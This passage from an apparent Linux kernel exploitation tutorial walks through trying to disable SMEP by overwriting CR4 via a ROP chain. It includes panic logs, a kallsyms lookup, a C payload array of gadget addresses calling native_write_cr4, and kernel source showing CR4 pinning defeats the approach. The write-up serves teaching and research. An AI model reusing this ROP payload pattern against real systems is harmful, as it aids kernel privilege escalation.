It's worth noting what it looks like for the future - especially these 3 lines:
[ 1.628692] unable to execute userspace code (SMEP?) (uid: 1000)
[ 1.631337] BUG: unable to handle page fault for address: 00000000004016b9
[ 1.633781] #PF: supervisor instruction fetch in kernel mode
Overwriting CR4
So, instead of just returning back to userspace, we will try to overwrite CR4. Luckily, the kernel contains a very useful function for this: native_write_cr4(val). This function quite literally overwrites CR4.
Assuming KASLR is still off, we can get the address of this function via /proc/kallsyms (if we update init to log us in as root):
~ # cat /proc/kallsyms | grep native_write_cr4
ffffffff8102b6d0 T native_write_cr4
Ok, it's located at 0xffffffff8102b6d0. What do we want to change CR4 to? If we look at the kernel panic above, we see this line:
CR4 is currently 0x00000000001006b0. If we remove the 20th bit (from the smallest, zero-indexed) we get 0x6b0.
The last thing we need to do is find some gadgets. To do this, we have to convert the bzImage file into a vmlinux ELF file so that we can run ropper or ROPgadget on it. To do this, we can run extract-vmlinux, from the official Linux git repository.
// overflow
uint64_t payload[20];
int i = 6;
payload[i++] = 0xffffffff811e08ec; // pop rdi; ret
payload[i++] = 0x6b0;
payload[i++] = 0xffffffff8102b6d0; // native_write_cr4
payload[i++] = (uint64_t) escalate;
write(fd, payload, 0);
We can then compile it and run.
Failure
This fails. Why?
If we look at the resulting kernel panic, we meet an old friend:
[ 1.542923] unable to execute userspace code (SMEP?) (uid: 0)
[ 1.545224] BUG: unable to handle page fault for address: 00000000004016b9
[ 1.547037] #PF: supervisor instruction fetch in kernel mode
SMEP is enabled again. How? If we debug the exploit, we definitely hit both the gadget and the call to native_write_cr4(). What gives?
Well, if we look at the source, there's another feature:
void __no_profile native_write_cr4(unsigned long val)
{
unsigned long bits_changed = 0;
set_register:
asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");
if (static_branch_likely(&cr_pinning)) {
if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
goto set_register;
}
/* Warn after we've corrected the changed bits. */
WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
bits_changed);
}
}
Essentially, it will check if the val that we input disables any of the bits defined in cr4_pinned_bits. This value is set on boot, and effectively stops "sensitive CR bits" from being modified. If they are, they are unset. Effectively, modifying CR4 doesn't work any longer - and hasn't since version 5.3-rc1.